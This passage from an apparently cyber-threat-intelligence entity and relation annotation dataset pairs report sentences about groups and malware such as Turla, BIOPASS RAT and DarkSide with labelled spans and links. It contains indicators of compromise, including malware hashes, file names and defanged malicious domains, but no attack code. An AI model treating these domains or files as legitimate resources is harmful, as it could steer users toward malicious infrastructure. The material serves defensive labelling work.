"start_offset": 144
}
] | [
{
"from_id": 1837,
"id": 157,
"to_id": 46168,
"type": "indicates"
}
] |
4,804 | Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment. | [
{
"end_offset": 51,
"id": 50714,
"label": "identity",
"start_offset": 48
},
{
"end_offset": 93,
"id": 50715,
"label": "threat-actor",
"start_offset": 88
},
{
"end_offset": 190,
"id": 50719,
"label": "SOFTWARE",
"start_offset": 183
},
{
"end_offset": 132,
"id": 50716,
"label": "location",
"start_offset": 126
},
{
"end_offset": 165,
"id": 50717,
"label": "identity",
"start_offset": 135
},
{
"end_offset": 244,
"id": 50718,
"label": "identity",
"start_offset": 221
}
] | [
{
"from_id": 50717,
"id": 994,
"to_id": 50716,
"type": "located-at"
},
{
"from_id": 50715,
"id": 995,
"to_id": 50717,
"type": "attributed-to"
},
{
"from_id": 50715,
"id": 996,
"to_id": 50718,
"type": "impersonates"
},
{
"from_id": 50715,
"id": 997,
"to_id": 50719,
"type": "uses"
}
] |
304 | Last Tuesday, Trusteer reported that a new variant of Citadel, which has long relied on VNC to give attackers remote control over systems, began adding new credentials to systems it infects and enabling the standard Windows remote desktop application (RDP). | [
{
"end_offset": 61,
"id": 1035,
"label": "malware",
"start_offset": 54
},
{
"end_offset": 91,
"id": 46000,
"label": "tools",
"start_offset": 88
},
{
"end_offset": 256,
"id": 46001,
"label": "tools",
"start_offset": 216
},
{
"end_offset": 22,
"id": 46002,
"label": "identity",
"start_offset": 14
},
{
"end_offset": 12,
"id": 46003,
"label": "TIME",
"start_offset": 0
}
] | [
{
"from_id": 1035,
"id": 142,
"to_id": 46000,
"type": "uses"
},
{
"from_id": 1035,
"id": 143,
"to_id": 46001,
"type": "uses"
}
] |
13,156 | A sample scenario of the USBferry attack Tropic Trooper is well aware that military or government organizations may have more robust security in their physically isolated environments (i.e., the use of biometrics or USB use in a quarantined machine before an air-gapped environment). | [
{
"end_offset": 55,
"id": 48940,
"label": "threat-actor",
"start_offset": 41
},
{
"end_offset": 34,
"id": 48939,
"label": "malware",
"start_offset": 25
}
] | [
{
"from_id": 48939,
"id": 504,
"to_id": 48940,
"type": "related-to"
}
] |
4,376 | In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts. | [
{
"end_offset": 56,
"id": 13122,
"label": "threat-actor",
"start_offset": 41
},
{
"end_offset": 16,
"id": 50182,
"label": "TIME",
"start_offset": 3
},
{
"end_offset": 21,
"id": 50183,
"label": "identity",
"start_offset": 18
},
{
"end_offset": 105,
"id": 50188,
"label": "attack-pattern",
"start_offset": 90
},
{
"end_offset": 124,
"id": 50186,
"label": "SOFTWARE",
"start_offset": 118
},
{
"end_offset": 80,
"id": 50184,
"label": "malware",
"start_offset": 69
},
{
"end_offset": 116,
"id": 50185,
"label": "SOFTWARE",
"start_offset": 111
},
{
"end_offset": 147,
"id": 50187,
"label": "SOFTWARE",
"start_offset": 130
}
] | [
{
"from_id": 50184,
"id": 926,
"to_id": 13122,
"type": "authored-by"
},
{
"from_id": 50184,
"id": 927,
"to_id": 50188,
"type": "uses"
},
{
"from_id": 50184,
"id": 928,
"to_id": 50185,
"type": "targets"
},
{
"from_id": 50184,
"id": 929,
"to_id": 50186,
"type": "targets"
},
{
"from_id": 50184,
"id": 930,
"to_id": 50187,
"type": "targets"
}
] |
1,858 | Deploying across the network We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network. | [
{
"end_offset": 113,
"id": 46986,
"label": "attack-pattern",
"start_offset": 83
},
{
"end_offset": 68,
"id": 46985,
"label": "tools",
"start_offset": 65
}
] | [
{
"from_id": 46986,
"id": 283,
"to_id": 46985,
"type": "uses"
}
] |
13,921 | Based on Trend Micro data, the US is by far DarkSide’s most targeted country, at more than 500 detections, followed by France, Belgium, and Canada. | [
{
"end_offset": 55,
"id": 48745,
"label": "malware",
"start_offset": 44
},
{
"end_offset": 134,
"id": 48748,
"label": "location",
"start_offset": 127
},
{
"end_offset": 125,
"id": 48747,
"label": "location",
"start_offset": 119
},
{
"end_offset": 34,
"id": 48746,
"label": "location",
"start_offset": 31
},
{
"end_offset": 146,
"id": 48749,
"label": "location",
"start_offset": 140
}
] | [
{
"from_id": 48745,
"id": 452,
"to_id": 48746,
"type": "targets"
},
{
"from_id": 48745,
"id": 455,
"to_id": 48749,
"type": "targets"
},
{
"from_id": 48745,
"id": 453,
"to_id": 48747,
"type": "targets"
},
{
"from_id": 48745,
"id": 454,
"to_id": 48748,
"type": "targets"
}
] |
679 | An example for such attack vector being leveraged by attackers is CVE-2018-4878, an Adobe Flash Player Zero-Day exploited by embedding malicious SWF files in Excel documents. | [
{
"end_offset": 79,
"id": 46251,
"label": "vulnerability",
"start_offset": 66
},
{
"end_offset": 102,
"id": 46252,
"label": "SOFTWARE",
"start_offset": 84
},
{
"end_offset": 173,
"id": 46253,
"label": "attack-pattern",
"start_offset": 125
}
] | [
{
"from_id": 46252,
"id": 176,
"to_id": 46251,
"type": "has"
},
{
"from_id": 46251,
"id": 177,
"to_id": 46253,
"type": "uses"
}
] |
3,411 | BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A bd8dc7e3909f6663c0fff653d7afbca2b89f2e9bc6f27adaab27f640ccf52975 Silverlight.exe | [
{
"end_offset": 11,
"id": 10291,
"label": "malware",
"start_offset": 0
},
{
"end_offset": 110,
"id": 10292,
"label": "hash",
"start_offset": 46
},
{
"end_offset": 44,
"id": 49092,
"label": "malware",
"start_offset": 20
},
{
"end_offset": 127,
"id": 49093,
"label": "FILEPATH",
"start_offset": 112
}
] | [
{
"from_id": 10291,
"id": 685,
"to_id": 49092,
"type": "duplicate-of"
},
{
"from_id": 49093,
"id": 686,
"to_id": 10292,
"type": "duplicate-of"
},
{
"from_id": 49093,
"id": 687,
"to_id": 49092,
"type": "indicates"
},
{
"from_id": 10292,
"id": 688,
"to_id": 49092,
"type": "indicates"
}
] |
4,812 | In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro. | [
{
"end_offset": 50,
"id": 50733,
"label": "malware",
"start_offset": 39
},
{
"end_offset": 29,
"id": 50732,
"label": "SOFTWARE",
"start_offset": 18
},
{
"end_offset": 68,
"id": 50734,
"label": "malware",
"start_offset": 52
},
{
"end_offset": 118,
"id": 50735,
"label": "url",
"start_offset": 107
}
] | [
{
"from_id": 50735,
"id": 999,
"to_id": 50734,
"type": "hosts"
},
{
"from_id": 50735,
"id": 1000,
"to_id": 50733,
"type": "hosts"
}
] |
4,171 | After checking the backdoor SmileSvr, we found that there was a code similarity between it and Troj_YAHAMAM, which was used by Earth Centaur in an earlier operation. | [
{
"end_offset": 107,
"id": 49973,
"label": "malware",
"start_offset": 95
},
{
"end_offset": 140,
"id": 49974,
"label": "threat-actor",
"start_offset": 127
}
] | [
{
"from_id": 49974,
"id": 897,
"to_id": 49973,
"type": "uses"
}
] |
14,265 | Figure 1. Tweets that mention Virtual Girlfriend and the short link of hxxp://miakhalifagame[.]com/ Maikspy on the Android platform Figure 2. | [
{
"end_offset": 99,
"id": 48479,
"label": "URL",
"start_offset": 71
},
{
"end_offset": 108,
"id": 48480,
"label": "malware",
"start_offset": 100
},
{
"end_offset": 123,
"id": 48481,
"label": "SOFTWARE",
"start_offset": 115
}
] | [
{
"from_id": 48479,
"id": 427,
"to_id": 48480,
"type": "related-to"
},
{
"from_id": 48480,
"id": 428,
"to_id": 48481,
"type": "targets"
}
] |
1,035 | Based on our investigation, we believe that stolen accounts for these universities are actively selling on Taobao. | [
{
"end_offset": 114,
"id": 44920,
"label": "SOFTWARE",
"start_offset": 108
},
{
"end_offset": 60,
"id": 44921,
"label": "attack-pattern",
"start_offset": 45
}
] | [
{
"from_id": 44921,
"id": 195,
"to_id": 44920,
"type": "related-to"
}
] |
370 | After analysis of the compromise, Volexity determined the initial foothold was the result of a remote code execution vulnerability in Confluence Server and Data Center. | [
{
"end_offset": 130,
"id": 46061,
"label": "vulnerability",
"start_offset": 95
},
{
"end_offset": 167,
"id": 46063,
"label": "SOFTWARE",
"start_offset": 134
},
{
"end_offset": 42,
"id": 46062,
"label": "identity",
"start_offset": 34
}
] | [
{
"from_id": 46063,
"id": 154,
"to_id": 46061,
"type": "has"
}
] |
5,462 | We stumbled upon the Confucius hacking group while delving into Patchwork’s cyberespionage operations, and found a number of similarities. | [
{
"end_offset": 73,
"id": 51448,
"label": "threat-actor",
"start_offset": 64
},
{
"end_offset": 30,
"id": 51449,
"label": "threat-actor",
"start_offset": 21
}
] | [
{
"from_id": 51449,
"id": 1096,
"to_id": 51448,
"type": "related-to"
}
] |
4,475 | Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users. | [
{
"end_offset": 133,
"id": 50274,
"label": "SOFTWARE",
"start_offset": 126
},
{
"end_offset": 66,
"id": 50271,
"label": "vulnerability",
"start_offset": 42
},
{
"end_offset": 83,
"id": 50272,
"label": "SOFTWARE",
"start_offset": 77
},
{
"end_offset": 95,
"id": 50273,
"label": "SOFTWARE",
"start_offset": 88
}
] | [
{
"from_id": 50272,
"id": 940,
"to_id": 50271,
"type": "has"
},
{
"from_id": 50273,
"id": 941,
"to_id": 50271,
"type": "has"
}
] |
13,940 | Jon Clay, Director of Global Threat Communications at Trend Micro, outlines the phases of ransomware: | [
{
"end_offset": 9,
"id": 48758,
"label": "identity",
"start_offset": 0
},
{
"end_offset": 65,
"id": 48759,
"label": "identity",
"start_offset": 54
}
] | [
{
"from_id": 48759,
"id": 458,
"to_id": 48758,
"type": "related-to"
}
] |
3,199 | Authenticode-signed files are either downloaded from the official websites (as seen in sample c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5) or are hosted on Alibaba Cloud OSS on the attackers’ account. | [
{
"end_offset": 194,
"id": 48324,
"label": "Infrastucture",
"start_offset": 177
},
{
"end_offset": 158,
"id": 9783,
"label": "hash",
"start_offset": 94
}
] | [
{
"from_id": 48324,
"id": 406,
"to_id": 9783,
"type": "hosts"
}
] |
2,557 | And from this we can see how credential theft is the keystone of Shamoon 2 attacks; if an organization can prevent credential theft, the Shamoon 2 attacks can’t succeed. | [
{
"end_offset": 46,
"id": 47751,
"label": "attack-pattern",
"start_offset": 30
},
{
"end_offset": 132,
"id": 47753,
"label": "attack-pattern",
"start_offset": 116
},
{
"end_offset": 75,
"id": 47752,
"label": "threat-actor",
"start_offset": 66
},
{
"end_offset": 147,
"id": 47754,
"label": "threat-actor",
"start_offset": 138
}
] | [
{
"from_id": 47752,
"id": 346,
"to_id": 47751,
"type": "uses"
},
{
"from_id": 47754,
"id": 347,
"to_id": 47753,
"type": "uses"
}
] |
3,433 | aos.exe BIOPASS RAT binary (PyInstaller) Trojan.Win32.BIOPASS.A afbfe16cbdd574d64c24ad97810b04db509505522e5bb7b9ca3b497efc731045 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 0b9f605926df4ff190ddc6c11e0f5839bffe431a3ddfd90acde1fcd2f91dada3 socketio.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 6fc307063c376b8be2d3a9545959e068884d9cf7f819b176adf676fc4addef7d flash_ins_bak.exe BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A 7249ad971283e164b0489110c23f4e40c64ee49b49bcc5cd0d32d9e701ec2114 files.zip BIOPASS RAT binary (Nuitka) Trojan.Win32.BIOPASS.A de17e583a4d112ce513efd4b7cb575d272dcceef229f81360ebdfa5a1e083f11 fn.exe BIOPASS RAT binary (Nuitka) Trojan | [
{
"end_offset": 131,
"id": 10324,
"label": "hash",
"start_offset": 67
},
{
"end_offset": 535,
"id": 10330,
"label": "hash",
"start_offset": 471
},
{
"end_offset": 665,
"id": 10332,
"label": "hash",
"start_offset": 601
},
{
"end_offset": 264,
"id": 10326,
"label": "hash",
"start_offset": 200
},
{
"end_offset": 397,
"id": 10328,
"label": "hash",
"start_offset": 333
},
{
"end_offset": 7,
"id": 49123,
"label": "FILEPATH",
"start_offset": 0
},
{
"end_offset": 307,
"id": 49129,
"label": "malware",
"start_offset": 280
},
{
"end_offset": 673,
"id": 49132,
"label": "FILEPATH",
"start_offset": 667
},
{
"end_offset": 174,
"id": 49135,
"label": "malware",
"start_offset": 147
},
{
"end_offset": 445,
"id": 49136,
"label": "malware",
"start_offset": 418
},
{
"end_offset": 65,
"id": 49124,
"label": "malware",
"start_offset": 43
},
{
"end_offset": 145,
"id": 49125,
"label": "FILEPATH",
"start_offset": 133
},
{
"end_offset": 198,
"id": 49126,
"label": "malware",
"start_offset": 176
},
{
"end_offset": 278,
"id": 49127,
"label": "FILEPATH",
"start_offset": 266
},
{
"end_offset": 331,
"id": 49128,
"label": "malware",
"start_offset": 309
},
{
"end_offset": 416,
"id": 49130,
"label": "FILEPATH",
"start_offset": 399
},
{
"end_offset": 546,
"id": 49131,
"label": "FILEPATH",
"start_offset": 537
},
{
"end_offset": 599,
"id": 49133,
"label": "malware",
"start_offset": 577
},
{
"end_offset": 41,
"id": 49134,
"label": "malware",
"start_offset": 9
},
{
"end_offset": 469,
"id": 49137,
"label": "malware",
"start_offset": 447
},
{
"end_offset": 575,
"id": 49138,
"label": "malware",
"start_offset": 548
},
{
"end_offset": 710,
"id": 49139,
"label": "malware",
"start_offset": 675
}
] | [
{
"from_id": 49123,
"id": 729,
"to_id": 49124,
"type": "indicates"
},
{
"from_id": 49134,
"id": 730,
"to_id": 49124,
"type": "duplicate-of"
},
{
"from_id": 10324,
"id": 731,
"to_id": 49124,
"type": "indicates"
},
{
"from_id": 49125,
"id": 732,
"to_id": 49124,
"type": "indicates"
},
{
"from_id": 49135,
"id": 733,
"to_id": 49126,
"type": "duplicate-of"
},
{
"from_id": 10326,
"id": 734,
"to_id": 49126,
"type": "indicates"
},
{
"from_id": 49127,
"id": 735,
"to_id": 49126,
"type": "indicates"
},
{
"from_id": 49127,
"id": 736,
"to_id": 10326,
"type": "duplicate-of"
},
{
"from_id": 49129,
"id": 737,
"to_id": 49128,
"type": "duplicate-of"
},
{
"from_id": 10328,
"id": 738,
"to_id": 49128,
"type": "indicates"
},
{
"from_id": 49130,
"id": 739,
"to_id": 49128,
"type": "indicates"
},
{
"from_id": 49130,
"id": 740,
"to_id": 10328,
"type": "duplicate-of"
},
{
"from_id": 49136,
"id": 741,
"to_id": 49137,
"type": "duplicate-of"
},
{
"from_id": 49131,
"id": 742,
"to_id": 10330,
"type": "duplicate-of"
},
{
"from_id": 49131,
"id": 743,
"to_id": 49137,
"type": "indicates"
},
{
"from_id": 10330,
"id": 744,
"to_id": 49137,
"type": "indicates"
},
{
"from_id": 49138,
"id": 745,
"to_id": 49133,
"type": "duplicate-of"
},
{
"from_id": 49139,
"id": 746,
"to_id": 49133,
"type": "duplicate-of"
},
{
"from_id": 49132,
"id": 747,
"to_id": 10332,
"type": "duplicate-of"
},
{
"from_id": 49132,
"id": 748,
"to_id": 49133,
"type": "indicates"
},
{
"from_id": 10332,
"id": 749,
"to_id": 49133,
"type": "indicates"
}
] |
3,437 | Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. | [
{
"end_offset": 69,
"id": 49198,
"label": "attack-pattern",
"start_offset": 48
},
{
"end_offset": 44,
"id": 49200,
"label": "vulnerability",
"start_offset": 26
},
{
"end_offset": 113,
"id": 49199,
"label": "attack-pattern",
"start_offset": 74
}
] | [
{
"from_id": 49198,
"id": 752,
"to_id": 49200,
"type": "targets"
},
{
"from_id": 49199,
"id": 753,
"to_id": 49200,
"type": "targets"
}
] |
3,684 | We detected a variant of the Carbanak malware that adds registry entries and keys as an autostart technique. | [
{
"end_offset": 45,
"id": 49477,
"label": "malware",
"start_offset": 29
},
{
"end_offset": 107,
"id": 49479,
"label": "attack-pattern",
"start_offset": 51
}
] | [
{
"from_id": 49477,
"id": 803,
"to_id": 49479,
"type": "uses"
}
] |
4,356 | It should be noted that in some occasions, the threat actor sent spear-phishing emails from the domain name mailerservice[.]directory which we attributed to the Patchwork threat actor in previous research. | [
{
"end_offset": 79,
"id": 50138,
"label": "attack-pattern",
"start_offset": 65
},
{
"end_offset": 133,
"id": 50139,
"label": "url",
"start_offset": 108
},
{
"end_offset": 170,
"id": 50140,
"label": "threat-actor",
"start_offset": 161
}
] | [
{
"from_id": 50139,
"id": 919,
"to_id": 50140,
"type": "attributed-to"
}
] |